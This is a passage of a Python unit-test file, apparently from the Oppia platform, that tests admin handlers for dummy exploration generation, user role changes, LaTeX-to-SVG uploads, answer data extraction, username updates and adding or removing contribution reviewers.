with self.assertRaisesRegexp(
Exception, 'invalid_type is not a number'):
self.post_json(
'/adminhandler', {
'action': 'generate_dummy_explorations',
'num_dummy_exps_to_publish': 1,
'num_dummy_exps_to_generate': 'invalid_type'
}, csrf_token=csrf_token)
generated_exps = exp_services.get_all_exploration_summaries()
published_exps = exp_services.get_recently_published_exp_summaries(5)
self.assertEqual(generated_exps, {})
self.assertEqual(published_exps, {})
self.logout()
def test_handler_raises_error_with_non_int_num_dummy_exps_to_publish(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
with self.assertRaisesRegexp(
Exception, 'invalid_type is not a number'):
self.post_json(
'/adminhandler', {
'action': 'generate_dummy_explorations',
'num_dummy_exps_to_publish': 'invalid_type',
'num_dummy_exps_to_generate': 1
}, csrf_token=csrf_token)
generated_exps = exp_services.get_all_exploration_summaries()
published_exps = exp_services.get_recently_published_exp_summaries(5)
self.assertEqual(generated_exps, {})
self.assertEqual(published_exps, {})
self.logout()
def test_cannot_generate_dummy_explorations_in_prod_mode(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
prod_mode_swap = self.swap(constants, 'DEV_MODE', False)
assert_raises_regexp_context_manager = self.assertRaisesRegexp(
Exception, 'Cannot generate dummy explorations in production.')
with assert_raises_regexp_context_manager, prod_mode_swap:
self.post_json(
'/adminhandler', {
'action': 'generate_dummy_explorations',
'num_dummy_exps_to_generate': 10,
'num_dummy_exps_to_publish': 3
}, csrf_token=csrf_token)
generated_exps = exp_services.get_all_exploration_summaries()
published_exps = exp_services.get_recently_published_exp_summaries(5)
self.assertEqual(generated_exps, {})
self.assertEqual(published_exps, {})
self.logout()
class AdminRoleHandlerTest(test_utils.GenericTestBase):
"""Checks the user role handling on the admin page."""
def setUp(self):
"""Complete the signup process for self.ADMIN_EMAIL."""
super(AdminRoleHandlerTest, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.set_admins([self.ADMIN_USERNAME])
def test_view_and_update_role(self):
user_email = '[email protected]'
username = 'user1'
self.signup(user_email, username)
self.login(self.ADMIN_EMAIL, is_super_admin=True)
# Check normal user has expected role. Viewing by username.
response_dict = self.get_json(
feconf.ADMIN_ROLE_HANDLER_URL,
params={'filter_criterion': 'username', 'username': 'user1'})
self.assertEqual(
response_dict, {'user1': feconf.ROLE_ID_EXPLORATION_EDITOR})
# Check role correctly gets updated.
csrf_token = self.get_new_csrf_token()
response_dict = self.post_json(
feconf.ADMIN_ROLE_HANDLER_URL,
{'role': feconf.ROLE_ID_MODERATOR, 'username': username},
csrf_token=csrf_token,
expected_status_int=200)
self.assertEqual(response_dict, {})
# Viewing by role.
response_dict = self.get_json(
feconf.ADMIN_ROLE_HANDLER_URL,
params={
'filter_criterion': 'role',
'role': feconf.ROLE_ID_MODERATOR
})
self.assertEqual(response_dict, {'user1': feconf.ROLE_ID_MODERATOR})
self.logout()
def test_invalid_username_in_filter_criterion_and_update_role(self):
username = 'myinvaliduser'
self.login(self.ADMIN_EMAIL, is_super_admin=True)
# Trying to view role of non-existent user.
self.get_json(
feconf.ADMIN_ROLE_HANDLER_URL,
params={'filter_criterion': 'username', 'username': username},
expected_status_int=400)
# Trying to update role of non-existent user.
csrf_token = self.get_new_csrf_token()
self.post_json(
feconf.ADMIN_ROLE_HANDLER_URL,
{'role': feconf.ROLE_ID_MODERATOR, 'username': username},
csrf_token=csrf_token,
expected_status_int=400)
def test_cannot_view_role_with_invalid_view_filter_criterion(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
response = self.get_json(
feconf.ADMIN_ROLE_HANDLER_URL,
params={'filter_criterion': 'invalid', 'username': 'user1'},
expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid filter criterion to view roles.')
def test_changing_user_role_from_topic_manager_to_moderator(self):
user_email = '[email protected]'
username = 'user1'
self.signup(user_email, username)
self.set_topic_managers([username])
self.login(self.ADMIN_EMAIL, is_super_admin=True)
response_dict = self.get_json(
feconf.ADMIN_ROLE_HANDLER_URL,
params={'filter_criterion': 'username', 'username': username})
self.assertEqual(
response_dict, {username: feconf.ROLE_ID_TOPIC_MANAGER})
# Check role correctly gets updated.
csrf_token = self.get_new_csrf_token()
response_dict = self.post_json(
feconf.ADMIN_ROLE_HANDLER_URL,
{'role': feconf.ROLE_ID_MODERATOR, 'username': username},
csrf_token=csrf_token)
self.assertEqual(response_dict, {})
response_dict = self.get_json(
feconf.ADMIN_ROLE_HANDLER_URL,
params={'filter_criterion': 'username', 'username': username})
self.assertEqual(response_dict, {username: feconf.ROLE_ID_MODERATOR})
self.logout()
def test_changing_user_role_from_exploration_editor_to_topic_manager(self):
user_email = '[email protected]'
username = 'user1'
self.signup(user_email, username)
user_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
topic_id = topic_services.get_new_topic_id()
self.save_new_topic(
topic_id, user_id, name='Name',
abbreviated_name='abbrev', url_fragment='url-fragment',
description='Description', canonical_story_ids=[],
additional_story_ids=[], uncategorized_skill_ids=[],
subtopics=[], next_subtopic_id=1)
self.login(self.ADMIN_EMAIL, is_super_admin=True)
response_dict = self.get_json(
feconf.ADMIN_ROLE_HANDLER_URL,
params={'filter_criterion': 'username', 'username': username})
self.assertEqual(
response_dict, {username: feconf.ROLE_ID_EXPLORATION_EDITOR})
# Check role correctly gets updated.
csrf_token = self.get_new_csrf_token()
response_dict = self.post_json(
feconf.ADMIN_ROLE_HANDLER_URL,
{'role': feconf.ROLE_ID_TOPIC_MANAGER, 'username': username,
'topic_id': topic_id}, csrf_token=csrf_token)
self.assertEqual(response_dict, {})
response_dict = self.get_json(
feconf.ADMIN_ROLE_HANDLER_URL,
params={'filter_criterion': 'username', 'username': username})
self.assertEqual(
response_dict, {username: feconf.ROLE_ID_TOPIC_MANAGER})
self.logout()
class ExplorationsLatexSvgHandlerTest(test_utils.GenericTestBase):
"""Tests for Saving Math SVGs in explorations."""
def setUp(self):
"""Complete the signup process for self.ADMIN_EMAIL."""
super(ExplorationsLatexSvgHandlerTest, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.set_admins([self.ADMIN_USERNAME])
def test_get_latex_to_svg_mapping(self):
user_email = '[email protected]'
username = 'user1'
self.signup(user_email, username)
self.login(self.ADMIN_EMAIL, is_super_admin=True)
multiple_explorations_math_rich_text_info = []
math_rich_text_info1 = (
exp_domain.ExplorationMathRichTextInfo(
'exp_id1', True, ['abc1', 'xyz1']))
multiple_explorations_math_rich_text_info.append(math_rich_text_info1)
math_rich_text_info2 = (
exp_domain.ExplorationMathRichTextInfo(
'exp_id2', True, ['abc2', 'xyz2']))
multiple_explorations_math_rich_text_info.append(math_rich_text_info2)
math_rich_text_info3 = (
exp_domain.ExplorationMathRichTextInfo(
'exp_id3', True, ['abc3', 'xyz3']))
multiple_explorations_math_rich_text_info.append(math_rich_text_info3)
exp_services.save_multi_exploration_math_rich_text_info_model(
multiple_explorations_math_rich_text_info)
response_dict = self.get_json(
feconf.EXPLORATIONS_LATEX_SVG_HANDLER,
params={'item_to_fetch': 'exp_id_to_latex_mapping'})
expected_response = {
'exp_id1': ['abc1', 'xyz1'],
'exp_id2': ['abc2', 'xyz2']
}
self.assertEqual(
response_dict,
{'latex_strings_to_exp_id_mapping': expected_response})
def test_get_when_invalid_item_to_fetch_item_given(self):
user_email = '[email protected]'
username = 'user1'
self.signup(user_email, username)
self.login(self.ADMIN_EMAIL, is_super_admin=True)
response_dict = self.get_json(
feconf.EXPLORATIONS_LATEX_SVG_HANDLER,
params={'item_to_fetch': 'invalid'},
expected_status_int=400)
self.assertIn(
'Please specify a valid type of item to fetch.',
response_dict['error'])
def test_get_number_explorations_left_to_update(self):
user_email = '[email protected]'
username = 'user1'
self.signup(user_email, username)
self.login(self.ADMIN_EMAIL, is_super_admin=True)
multiple_explorations_math_rich_text_info = []
math_rich_text_info1 = (
exp_domain.ExplorationMathRichTextInfo(
'exp_id1', True, ['abc1', 'xyz1']))
multiple_explorations_math_rich_text_info.append(math_rich_text_info1)
math_rich_text_info2 = (
exp_domain.ExplorationMathRichTextInfo(
'exp_id2', True, ['abc2', 'xyz2']))
multiple_explorations_math_rich_text_info.append(math_rich_text_info2)
math_rich_text_info3 = (
exp_domain.ExplorationMathRichTextInfo(
'exp_id3', True, ['abc3', 'xyz3']))
multiple_explorations_math_rich_text_info.append(math_rich_text_info3)
exp_services.save_multi_exploration_math_rich_text_info_model(
multiple_explorations_math_rich_text_info)
response_dict = self.get_json(
feconf.EXPLORATIONS_LATEX_SVG_HANDLER,
params={'item_to_fetch': 'number_of_explorations_left_to_update'})
self.assertEqual(
response_dict,
{'number_of_explorations_left_to_update': '3'})
def test_post_svgs_when_all_values_are_valid(self):
user_email = '[email protected]'
username = 'user1'
self.signup(user_email, username)
self.login(self.ADMIN_EMAIL, is_super_admin=True)
editor_id = self.get_user_id_from_email(user_email)
post_data = {
'exp_id1': {
'+,+,+,+': {
'latexId': 'latex_id1',
'dimensions': {
'encoded_height_string': '1d429',
'encoded_width_string': '1d33',
'encoded_vertical_padding_string': '0d241'
}
},
'\\frac{x}{y}': {
'latexId': 'latex_id2',
'dimensions': {
'encoded_height_string': '1d525',
'encoded_width_string': '3d33',
'encoded_vertical_padding_string': '0d241'
}
}
}
}
csrf_token = self.get_new_csrf_token()
svg_file_1 = (
'<svg xmlns="http://www.w3.org/2000/svg" width="1.33ex" height="1.4'
'29ex" viewBox="0 -511.5 572.5 615.4" focusable="false" style="vert'
'ical-align: -0.241ex;"><g stroke="currentColor" fill="currentColo'
'r" stroke-width="0" transform="matrix(1 0 0 -1 0 0)"><path stroke'
'-width="1" d="M52 289Q59 331 106 386T222 442Q257 442 2864Q412 404'
' 406 402Q368 386 350 336Q290 115 290 78Q290 50 306 38T341 26Q37'
'8 26 414 59T463 140Q466 150 469 151T485 153H489Q504 153 504 145284'
' 52 289Z"/></g></svg>'
)
svg_file_2 = (
'<svg xmlns="http://www.w3.org/2000/svg" width="3.33ex" height="1.5'
'25ex" viewBox="0 -511.5 572.5 615.4" focusable="false" style="vert'
'ical-align: -0.241ex;"><g stroke="currentColor" fill="currentColo'
'r" stroke-width="0" transform="matrix(1 0 0 -1 0 0)"><path stroke'
'-width="1" d="M52 289Q59 331 106 386T222 442Q257 442 2864Q412 404'
' 406 402Q368 386 350 336Q290 115 290 78Q290 50 306 38T341 26Q37'
'8 26 414 59T463 140Q466 150 469 151T485 153H489Q504 153 504 145284'
' 52 289Z"/></g></svg>'
)
exploration1 = exp_domain.Exploration.create_default_exploration(
'exp_id1', title='title1', category='category')
exp_services.save_new_exploration(editor_id, exploration1)
exp_models.ExplorationMathRichTextInfoModel(
id='exp_id1',
math_images_generation_required=True,
latex_strings_without_svg=['+,+,+,+', '\\frac{x}{y}'],
estimated_max_size_of_images_in_bytes=20000).put()
response_dict = self.post_json(
feconf.EXPLORATIONS_LATEX_SVG_HANDLER,
{'latexMapping': post_data},
csrf_token=csrf_token,
upload_files=(
('latex_id1', 'latex_id1', svg_file_1),
('latex_id2', 'latex_id2', svg_file_2), ),
expected_status_int=200)
self.assertEqual(
response_dict,
{
'number_of_explorations_updated': '1',
'number_of_explorations_left_to_update': '0'
})
self.logout()
def test_post_svgs_when_some_images_are_not_supplied(self):
user_email = '[email protected]'
username = 'user1'
self.signup(user_email, username)
self.login(self.ADMIN_EMAIL, is_super_admin=True)
editor_id = self.get_user_id_from_email(user_email)
post_data = {
'exp_id1': {
'+,+,+,+': {
'latexId': 'latex_id1',
'dimensions': {
'encoded_height_string': '1d429',
'encoded_width_string': '1d33',
'encoded_vertical_padding_string': '0d241'
}
},
'\\frac{x}{y}': {
'latexId': 'latex_id2',
'dimensions': {
'encoded_height_string': '1d525',
'encoded_width_string': '3d33',
'encoded_vertical_padding_string': '0d241'
}
}
}
}
# Check role correctly gets updated.
csrf_token = self.get_new_csrf_token()
svg_file_1 = (
'<svg xmlns="http://www.w3.org/2000/svg" width="1.33ex" height="1.4'
'29ex" viewBox="0 -511.5 572.5 615.4" focusable="false" style="vert'
'ical-align: -0.241ex;"><g stroke="currentColor" fill="currentColo'
'r" stroke-width="0" transform="matrix(1 0 0 -1 0 0)"><path stroke'
'-width="1" d="M52 289Q59 331 106 386T222 442Q257 442 2864Q412 404'
' 406 402Q368 386 350 336Q290 115 290 78Q290 50 306 38T341 26Q37'
'8 26 414 59T463 140Q466 150 469 151T485 153H489Q504 153 504 145284'
' 52 289Z"/></g></svg>'
)
exploration1 = exp_domain.Exploration.create_default_exploration(
'exp_id1', title='title1', category='category')
exp_services.save_new_exploration(editor_id, exploration1)
response_dict = self.post_json(
feconf.EXPLORATIONS_LATEX_SVG_HANDLER,
{'latexMapping': post_data},
csrf_token=csrf_token,
upload_files=(
('latex_id1', 'latex_id1', svg_file_1),),
expected_status_int=400)
self.assertIn(
'SVG for LaTeX string \\frac{x}{y} in exploration exp_id1 is not '
'supplied.', response_dict['error'])
self.logout()
class DataExtractionQueryHandlerTests(test_utils.GenericTestBase):
"""Tests for data extraction handler."""
EXP_ID = 'exp'
def setUp(self):
"""Complete the signup process for self.ADMIN_EMAIL."""
super(DataExtractionQueryHandlerTests, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.exploration = self.save_new_valid_exploration(
self.EXP_ID, self.editor_id, end_state_name='End')
stats_services.record_answer(
self.EXP_ID, self.exploration.version,
self.exploration.init_state_name, 'TextInput',
stats_domain.SubmittedAnswer(
'first answer', 'TextInput', 0,
0, exp_domain.EXPLICIT_CLASSIFICATION, {},
'a_session_id_val', 1.0))
stats_services.record_answer(
self.EXP_ID, self.exploration.version,
self.exploration.init_state_name, 'TextInput',
stats_domain.SubmittedAnswer(
'second answer', 'TextInput', 0,
0, exp_domain.EXPLICIT_CLASSIFICATION, {},
'a_session_id_val', 1.0))
def test_data_extraction_handler(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
# Test that it returns all answers when 'num_answers' is 0.
payload = {
'exp_id': self.EXP_ID,
'exp_version': self.exploration.version,
'state_name': self.exploration.init_state_name,
'num_answers': 0
}
response = self.get_json(
'/explorationdataextractionhandler', params=payload)
extracted_answers = response['data']
self.assertEqual(len(extracted_answers), 2)
self.assertEqual(extracted_answers[0]['answer'], 'first answer')
self.assertEqual(extracted_answers[1]['answer'], 'second answer')
# Make sure that it returns only 'num_answers' number of answers.
payload = {
'exp_id': self.EXP_ID,
'exp_version': self.exploration.version,
'state_name': self.exploration.init_state_name,
'num_answers': 1
}
response = self.get_json(
'/explorationdataextractionhandler', params=payload)
extracted_answers = response['data']
self.assertEqual(len(extracted_answers), 1)
self.assertEqual(extracted_answers[0]['answer'], 'first answer')
def test_that_handler_raises_exception(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
payload = {
'exp_id': self.EXP_ID,
'exp_version': self.exploration.version,
'state_name': 'state name',
'num_answers': 0
}
response = self.get_json(
'/explorationdataextractionhandler', params=payload,
expected_status_int=400)
self.assertEqual(
response['error'],
'Exploration \'exp\' does not have \'state name\' state.')
def test_handler_raises_error_with_invalid_exploration_id(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
payload = {
'exp_id': 'invalid_exp_id',
'state_name': 'state name',
'exp_version': 1,
'num_answers': 0
}
response = self.get_json(
'/explorationdataextractionhandler', params=payload,
expected_status_int=400)
self.assertEqual(
response['error'],
'Entity for exploration with id invalid_exp_id and version 1 not '
'found.')
def test_handler_raises_error_with_invalid_exploration_version(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
payload = {
'exp_id': self.EXP_ID,
'state_name': 'state name',
'exp_version': 10,
'num_answers': 0
}
response = self.get_json(
'/explorationdataextractionhandler', params=payload,
expected_status_int=400)
self.assertEqual(
response['error'],
'Entity for exploration with id %s and version 10 not found.'
% self.EXP_ID)
class ClearSearchIndexTest(test_utils.GenericTestBase):
"""Tests that search index gets cleared."""
def test_clear_search_index(self):
exp_services.load_demo('0')
result_explorations = search_services.search_explorations(
'Welcome', 2)[0]
self.assertEqual(result_explorations, ['0'])
collection_services.load_demo('0')
result_collections = search_services.search_collections('Welcome', 2)[0]
self.assertEqual(result_collections, ['0'])
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
generated_exps_response = self.post_json(
'/adminhandler', {
'action': 'clear_search_index'
},
csrf_token=csrf_token)
self.assertEqual(generated_exps_response, {})
result_explorations = search_services.search_explorations(
'Welcome', 2)[0]
self.assertEqual(result_explorations, [])
result_collections = search_services.search_collections('Welcome', 2)[0]
self.assertEqual(result_collections, [])
class SendDummyMailTest(test_utils.GenericTestBase):
""""Tests for sending test mails to admin."""
def setUp(self):
super(SendDummyMailTest, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
def test_send_dummy_mail(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
with self.swap(feconf, 'CAN_SEND_EMAILS', True):
generated_response = self.post_json(
'/senddummymailtoadminhandler', {},
csrf_token=csrf_token, expected_status_int=200)
self.assertEqual(generated_response, {})
with self.swap(feconf, 'CAN_SEND_EMAILS', False):
generated_response = self.post_json(
'/senddummymailtoadminhandler', {},
csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
generated_response['error'], 'This app cannot send emails.')
class UpdateUsernameHandlerTest(test_utils.GenericTestBase):
"""Tests for updating usernames."""
OLD_USERNAME = 'oldUsername'
NEW_USERNAME = 'newUsername'
def setUp(self):
super(UpdateUsernameHandlerTest, self).setUp()
self.signup(self.ADMIN_EMAIL, self.OLD_USERNAME)
self.login(self.ADMIN_EMAIL, is_super_admin=True)
def test_update_username_with_none_new_username(self):
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/updateusernamehandler',
{
'old_username': self.OLD_USERNAME,
'new_username': None},
csrf_token=csrf_token,
expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid request: A new username must be '
'specified.')
def test_update_username_with_none_old_username(self):
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/updateusernamehandler',
{
'old_username': None,
'new_username': self.NEW_USERNAME},
csrf_token=csrf_token,
expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid request: The old username must be '
'specified.')
def test_update_username_with_non_string_new_username(self):
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/updateusernamehandler',
{
'old_username': self.OLD_USERNAME,
'new_username': 123},
csrf_token=csrf_token,
expected_status_int=400)
self.assertEqual(
response['error'], 'Expected new username to be a unicode '
'string, received 123')
def test_update_username_with_non_string_old_username(self):
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/updateusernamehandler',
{
'old_username': 123,
'new_username': self.NEW_USERNAME},
csrf_token=csrf_token,
expected_status_int=400)
self.assertEqual(
response['error'], 'Expected old username to be a unicode '
'string, received 123')
def test_update_username_with_long_new_username(self):
long_username = 'a' * (constants.MAX_USERNAME_LENGTH + 1)
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/updateusernamehandler',
{
'old_username': self.OLD_USERNAME,
'new_username': long_username},
csrf_token=csrf_token,
expected_status_int=400)
self.assertEqual(
response['error'], 'Expected new username to be less than %s '
'characters, received %s' % (
constants.MAX_USERNAME_LENGTH,
long_username))
def test_update_username_with_nonexistent_old_username(self):
non_existent_username = 'invalid'
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/updateusernamehandler',
{
'old_username': non_existent_username,
'new_username': self.NEW_USERNAME},
csrf_token=csrf_token,
expected_status_int=400)
self.assertEqual(response['error'], 'Invalid username: invalid')
def test_update_username_with_new_username_already_taken(self):
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/updateusernamehandler',
{
'old_username': self.OLD_USERNAME,
'new_username': self.OLD_USERNAME},
csrf_token=csrf_token,
expected_status_int=400)
self.assertEqual(response['error'], 'Username already taken.')
def test_update_username(self):
user_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
csrf_token = self.get_new_csrf_token()
self.put_json(
'/updateusernamehandler',
{
'old_username': self.OLD_USERNAME,
'new_username': self.NEW_USERNAME},
csrf_token=csrf_token)
self.assertEqual(user_services.get_username(user_id), self.NEW_USERNAME)
def test_update_username_creates_audit_model(self):
user_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
csrf_token = self.get_new_csrf_token()
creation_time_in_millisecs = utils.get_current_time_in_millisecs()
mock_get_current_time_in_millisecs = lambda: creation_time_in_millisecs
# Since the UsernameChangeAuditModel's ID is formed from the user ID and
# a millisecond timestamp we need to make sure that
# get_current_time_in_millisecs returns the same value as we have saved
# into current_time_in_millisecs. If we don't force the same value via
# swap flakes can occur, since as the time flows the saved milliseconds
# can differ from the milliseconds saved into the
# UsernameChangeAuditModel's ID.
with self.swap(
utils, 'get_current_time_in_millisecs',
mock_get_current_time_in_millisecs):
self.put_json(
'/updateusernamehandler',
{
'old_username': self.OLD_USERNAME,
'new_username': self.NEW_USERNAME},
csrf_token=csrf_token)
self.assertTrue(
audit_models.UsernameChangeAuditModel.has_reference_to_user_id(
user_id))
model_id = '%s.%d' % (user_id, creation_time_in_millisecs)
username_change_audit_model = (
audit_models.UsernameChangeAuditModel.get(model_id))
self.assertEqual(username_change_audit_model.committer_id, user_id)
self.assertEqual(
username_change_audit_model.old_username, self.OLD_USERNAME)
self.assertEqual(
username_change_audit_model.new_username, self.NEW_USERNAME)
class AddContributionReviewerHandlerTest(test_utils.GenericTestBase):
"""Tests related to add reviewers for contributor's
suggestion/application.
"""
TRANSLATION_REVIEWER_EMAIL = '[email protected]'
VOICEOVER_REVIEWER_EMAIL = '[email protected]'
QUESTION_REVIEWER_EMAIL = '[email protected]'
def setUp(self):
super(AddContributionReviewerHandlerTest, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.TRANSLATION_REVIEWER_EMAIL, 'translator')
self.signup(self.VOICEOVER_REVIEWER_EMAIL, 'voiceartist')
self.signup(self.QUESTION_REVIEWER_EMAIL, 'question')
self.translation_reviewer_id = self.get_user_id_from_email(
self.TRANSLATION_REVIEWER_EMAIL)
self.voiceover_reviewer_id = self.get_user_id_from_email(
self.VOICEOVER_REVIEWER_EMAIL)
self.question_reviewer_id = self.get_user_id_from_email(
self.QUESTION_REVIEWER_EMAIL)
def test_add_reviewer_with_invalid_username_raise_error(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.post_json(
'/addcontributionreviewerhandler', {
'username': 'invalid',
'review_category': 'translation',
'language_code': 'en'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid username: invalid')
def test_add_translation_reviewer(self):
self.assertFalse(
user_services.can_review_translation_suggestions(
self.translation_reviewer_id, language_code='hi'))
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
self.post_json(
'/addcontributionreviewerhandler', {
'username': 'translator',
'review_category': 'translation',
'language_code': 'hi'
}, csrf_token=csrf_token)
self.assertTrue(user_services.can_review_translation_suggestions(
self.translation_reviewer_id, language_code='hi'))
def test_add_translation_reviewer_in_invalid_language_raise_error(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.post_json(
'/addcontributionreviewerhandler', {
'username': 'translator',
'review_category': 'translation',
'language_code': 'invalid'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid language_code: invalid')
def test_assigning_same_language_for_translation_review_raise_error(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
self.assertFalse(
user_services.can_review_translation_suggestions(
self.translation_reviewer_id, language_code='hi'))
csrf_token = self.get_new_csrf_token()
self.post_json(
'/addcontributionreviewerhandler', {
'username': 'translator',
'review_category': 'translation',
'language_code': 'hi'
}, csrf_token=csrf_token)
self.assertTrue(
user_services.can_review_translation_suggestions(
self.translation_reviewer_id, language_code='hi'))
response = self.post_json(
'/addcontributionreviewerhandler', {
'username': 'translator',
'review_category': 'translation',
'language_code': 'hi'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'User translator already has rights to review translation in '
'language code hi')
def test_add_voiceover_reviewer(self):
self.assertFalse(
user_services.can_review_voiceover_applications(
self.voiceover_reviewer_id, language_code='hi'))
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
self.post_json(
'/addcontributionreviewerhandler', {
'username': 'voiceartist',
'review_category': 'voiceover',
'language_code': 'hi'
}, csrf_token=csrf_token)
self.assertTrue(user_services.can_review_voiceover_applications(
self.voiceover_reviewer_id, language_code='hi'))
def test_add_voiceover_reviewer_in_invalid_language(self):
self.assertFalse(
user_services.can_review_voiceover_applications(
self.voiceover_reviewer_id, language_code='hi'))
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.post_json(
'/addcontributionreviewerhandler', {
'username': 'voiceartist',
'review_category': 'voiceover',
'language_code': 'invalid'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid language_code: invalid')
self.assertFalse(
user_services.can_review_voiceover_applications(
self.voiceover_reviewer_id, language_code='hi'))
def test_assigning_same_language_for_voiceover_review_raise_error(self):
self.assertFalse(
user_services.can_review_voiceover_applications(
self.voiceover_reviewer_id, language_code='hi'))
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.post_json(
'/addcontributionreviewerhandler', {
'username': 'voiceartist',
'review_category': 'voiceover',
'language_code': 'hi'
}, csrf_token=csrf_token)
self.assertTrue(
user_services.can_review_voiceover_applications(
self.voiceover_reviewer_id, language_code='hi'))
response = self.post_json(
'/addcontributionreviewerhandler', {
'username': 'voiceartist',
'review_category': 'voiceover',
'language_code': 'hi'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'User voiceartist already has rights to review voiceover in '
'language code hi')
def test_add_question_reviewer(self):
self.assertFalse(user_services.can_review_question_suggestions(
self.question_reviewer_id))
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
self.post_json(
'/addcontributionreviewerhandler', {
'username': 'question',
'review_category': 'question'
}, csrf_token=csrf_token)
self.assertTrue(user_services.can_review_question_suggestions(
self.question_reviewer_id))
def test_assigning_same_user_as_question_reviewer_raise_error(self):
self.assertFalse(user_services.can_review_question_suggestions(
self.question_reviewer_id))
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.post_json(
'/addcontributionreviewerhandler', {
'username': 'question',
'review_category': 'question'
}, csrf_token=csrf_token)
self.assertTrue(user_services.can_review_question_suggestions(
self.question_reviewer_id))
response = self.post_json(
'/addcontributionreviewerhandler', {
'username': 'question',
'review_category': 'question'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'User question already has rights to review question.')
def test_add_reviewer_for_invalid_review_category_raise_error(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.post_json(
'/addcontributionreviewerhandler', {
'username': 'question',
'review_category': 'invalid'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid review_category: invalid')
class RemoveContributionReviewerHandlerTest(test_utils.GenericTestBase):
"""Tests related to remove reviewers from contributor dashboard page."""
TRANSLATION_REVIEWER_EMAIL = '[email protected]'
VOICEOVER_REVIEWER_EMAIL = '[email protected]'
QUESTION_REVIEWER_EMAIL = '[email protected]'
def setUp(self):
super(RemoveContributionReviewerHandlerTest, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.TRANSLATION_REVIEWER_EMAIL, 'translator')
self.signup(self.VOICEOVER_REVIEWER_EMAIL, 'voiceartist')
self.signup(self.QUESTION_REVIEWER_EMAIL, 'question')
self.translation_reviewer_id = self.get_user_id_from_email(
self.TRANSLATION_REVIEWER_EMAIL)
self.voiceover_reviewer_id = self.get_user_id_from_email(
self.VOICEOVER_REVIEWER_EMAIL)
self.question_reviewer_id = self.get_user_id_from_email(
self.QUESTION_REVIEWER_EMAIL)
def test_add_reviewer_without_username_raise_error(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/removecontributionreviewerhandler', {
'removal_type': 'all'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(response['error'], 'Missing username param')
def test_add_reviewer_with_invalid_username_raise_error(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/removecontributionreviewerhandler', {
'username': 'invalid',
'removal_type': 'all'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid username: invalid')
def test_remove_translation_reviewer(self):
self.assertFalse(
user_services.can_review_translation_suggestions(
self.translation_reviewer_id, language_code='hi'))
user_services.allow_user_to_review_translation_in_language(
self.translation_reviewer_id, 'hi')
self.assertTrue(
user_services.can_review_translation_suggestions(
self.translation_reviewer_id, language_code='hi'))
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
self.put_json(
'/removecontributionreviewerhandler', {
'username': 'translator',
'removal_type': 'specific',
'review_category': 'translation',
'language_code': 'hi'
}, csrf_token=csrf_token)
self.assertFalse(user_services.can_review_translation_suggestions(
self.translation_reviewer_id, language_code='hi'))
